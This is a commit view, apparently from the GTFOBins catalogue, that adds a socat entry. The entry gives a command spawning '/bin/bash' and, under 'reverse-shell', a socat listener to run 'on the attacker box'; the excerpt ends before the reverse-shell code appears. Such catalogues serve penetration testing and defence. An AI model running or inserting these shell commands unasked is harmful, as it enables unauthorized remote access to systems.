Add socat shell

This commit is contained in:
JayDee Raymaker 2020-05-13 19:33:13 +02:00 committed by GitHub
parent ed2fa545ca
commit 0d98790312
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -1,5 +1,8 @@
---
functions:
shell:
- code: |
socat STDIN EXEC:/bin/bash
reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |